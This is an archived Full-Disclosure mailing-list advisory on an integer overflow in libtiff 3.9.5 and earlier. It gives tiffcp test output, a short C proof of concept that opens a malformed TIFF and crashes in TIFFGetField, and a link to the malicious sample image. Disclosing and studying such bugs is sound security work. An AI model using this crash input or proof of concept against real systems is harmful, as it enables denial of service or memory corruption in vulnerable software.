lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sat, 24 Aug 2013 19:42:31 +0900
From: x90c <geinblues@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: libtiff <= 3.9.5 integer overflow bug

+----------------------------------------------------+
| XADV-2013001 libtiff <= 3.9.5 integer overflow bug |
+----------------------------------------------------+

vulnerable versions:
- libtiff 3.9.5 <=
- libtiff 3.6.0

not vulnerable versions:
- libtiff 4.0.3
- libtiff 4.0.2
- libtiff 4.0.1
- libtiff 4.0.0

release path:
4.0.3(latest) -> 4.0.2 -> 4.0.1 -> 4.0.0(patched)
-> 3.9.5(vulnerable)

testbed: linux distro
type: local
impact: medium
vendor: http://www.remotesensing.org/libtiff
author: x90c
site: x90c.org
email: geinblues@...il.com

==========
abstract:
==========

I discovered libtiff TIFFOpen integer overflow bug
by weird TIFFOpen call success with malformed tif
image file!

- tiffcp tool (tiffinfo, tiff2ps, ... also can test):
Many times tiffcp execution ... often, it entered to
tiffcp function in tiffcp tool after tiffopen. Often
calling openSrcImage success. malformed tif image
within count of SamplePerPixel or RowsPerStrip can be
opened by TIFFOpen even though can't tiffcp, TIFFWrite
Directory with the returned TIFF*

- integer overflow to heap corruption:
Malformed tif image file within SamplePerPixel
and RowsPerStrip can be opened the malformed tif
data. and can be calculated in other library
functions it leads to integer overflow to memory
corruption!

- exploitation:
Exploit tries many times to call TIFFOpen with
malformed tif file. sometimes after, the target program
used vulnerable libtiff can be corrupted if these two
field will passed validation checks


=========
details:
=========

tiff-v3.6.0/tools/tiffcp

Many times TIFFOpen calls
----
...
[root@...tos5 tools]# export SAMPLE=/home/x90c/sample_spp.tif
[root@...tos5 tools]# ./tiffcp -b $SAMPLE
/home/x90c/sample.tif: Integer overflow in TIFFVStripSize.
TIFFReadDirectory: /home/x90c/sample.tif: cannot handle zero strip size.
[root@...tos5 tools]# ./tiffcp -b $SAMPLE
/home/x90c/sample.tif: Integer overflow in TIFFVStripSize.
TIFFReadDirectory: /home/x90c/sample.tif: cannot handle zero strip size.
[root@...tos5 tools]# ./tiffcp -b $SAMPLE
/home/x90c/sample.tif: Integer overflow in TIFFVStripSize.
TIFFReadDirectory: /home/x90c/sample.tif: cannot handle zero strip size.
[root@...tos5 tools]# ./tiffcp -b $SAMPLE
samples=1392 imagewidth=2464 rowsperstrip=3248 // debug output
Bias image must be monochrome
[root@...tos5 tools]#
----
As you see, malformed td_samplesperpixel(sampleperpixel
 field of tif image) count of 2 changes these values 1,0
to a value of sample= of 1392(0x570). the invalid value
can be calculated and integer overflow!


===============
exploit codes:
===============

tiff_poc.c
--
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "tiffio.h"

int tiff_integer_overflow_test(){
TIFF* tif = TIFFOpen("/home/x90c/sample_spp.tif", "r");
int samples = 0;

/*
 * for instance, TIFFGetField library function will
 * called with malicious samplesperpixel field value
 * TIFFGetField got segfault!
 */
TIFFGetField(tif, TIFFTAG_SAMPLESPERPIXEL, &samples);

printf("tiff_poc: tif samplesperpixel field=%d\n", samples);
}
--

- I attached the sample_spp.tif:http://www.x90c.org/exploits/sample_spp.tif


=============
patch codes:
=============

tiff-4.0.3/tools/tiffcp (latest version)

----
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".
[root@...tos5 tools]# ./tiffcp $SAMPLE tc1.tif
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".
[root@...tos5 tools]# ./tiffcp $SAMPLE tc1.tif
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".
[root@...tos5 tools]# ./tiffcp $SAMPLE tc1.tif
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".
[root@...tos5 tools]# ./tiffcp $SAMPLE tc1.tif
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".
[root@...tos5 tools]# ./tiffcp $SAMPLE tc1.tif
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".
[root@...tos5 tools]# ./tiffcp $SAMPLE tc1.tif
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".
[root@...tos5 tools]# ./tiffcp $SAMPLE tc1.tif
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".
[root@...tos5 tools]# ./tiffcp $SAMPLE tc1.tif
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".
[root@...tos5 tools]#
.....
...
....
...
----
safe!


==============
vendor status:
==============
2013/08/24 - I discovered the security bug
2013/08/24 - the advisory released

Content of type "text/html" skipped

View attachment "xadv_2013001_libtiff.txt" of type "text/plain" (4491 bytes)

Download attachment "sample_spp.tif" of type "image/tiff" (125824 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists